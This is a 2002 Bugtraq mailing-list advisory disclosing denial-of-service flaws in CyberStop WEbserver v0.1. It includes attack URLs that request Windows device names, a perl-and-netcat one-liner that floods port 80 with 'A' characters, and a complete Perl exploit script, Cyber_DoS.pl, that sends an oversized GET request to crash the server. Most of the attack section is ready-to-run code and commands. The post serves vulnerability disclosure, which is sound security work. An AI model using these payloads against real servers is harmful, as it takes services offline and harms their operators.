[23955] in bugtraq
CyberStop-Server-DoS-remote-attacks
daemon@ATHENA.MIT.EDU (al3x hernandez)
Tue Jan 22 20:04:34 2002
Date: Tue, 22 Jan 2002 18:01:57 -0500
Message-Id: <200201222301.SAA20870@www22.ureach.com>
To: bugtraq@securityfocus.com
From: al3x hernandez <al3xhernandez@ureach.com>
Reply-To: <al3xhernandez@ureach.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="_uReach_com_1804289383101174051720867xxx_"
--_uReach_com_1804289383101174051720867xxx_
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Details on document attached.
/Alex Hernandez!
________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag
--_uReach_com_1804289383101174051720867xxx_
Content-Type: text/plain
Content-Disposition: attachment; filename="CyberStop-Server-DoS-remote-attacks.txt"
Content-Transfer-Encoding: 7bit
------oOo------
CyberStop WEbserver DoS Remote attacks.
------oOo------
CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities
which allow users to attack remote services on the server.
Exploit information included.
Company Affected: www.cyberstop.com.sg
Download: http://www.cyberstop.com.sg/webserver/webserver.zip
Version: v0.1
Date Added: 12-DIC-01
Size: 2.84 MB
OS Affected: Windows ALL.
Author:
** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins
** G.Maggiotti & H.Oliveira.
----=[Brief Description]=------------
DoS
A Denial of Service attack can be caused in the product by issuing
the following request:
http://www.example.com/aux
http://www.example.com/prn
http://www.example.com/com1
Also to send a long 'A^s' command to the server, resulting in the
server crashing.
----=[Summary]=----------------------
CyberStop WEbserver for Windows is a powerful Webserver software.
It can transform a normal pc into a very powerful server, It is
easily done by just clicking the html file and view your website
in the worldwide web, but exist remotes attacks on server very
dangerous.
------oOo------
Proof Of concept
# uname -a
SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
#
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 80
#
Exist a service named "Proyect1" and may be u can reading something
like this on Windows Server:
"Run-time error 40006":
Wrong protocol or connection state for the request transaction or
request.
"Run-time error "5":
Invalid procedure call or argument.
Crash system and the admin need restart the service!.
sh-2.04# nc -vvn 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (?) open
GET /aux HTTP/1.0
sh-2.04#
Some ports like mouse and printers on server crash and the admin
need restart the service!.
------oOo-------------
Exploit Code DoS Cyber_DoS.pl
------oOo-------------
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the server crashing.
#
# CyberStop WEbserver v0.1 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Cyber_DoS.pl -s <server>
#
# Example:
#
# perl -x Cyber_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print("\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);
$def = "A";
$num = "3000";
$data .= $def x $num;
$serv = $args{s};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print("\nCrash was successful !\n\n");
sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
------oOo------------------------------------
Vendor Response:
The vendor was notified
help@cyberstopasia.com
http://www.cyberstop.com.sg
Patch Temporary: No Data of vendor.
Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.
------oOo------------------------------------
--_uReach_com_1804289383101174051720867xxx_--
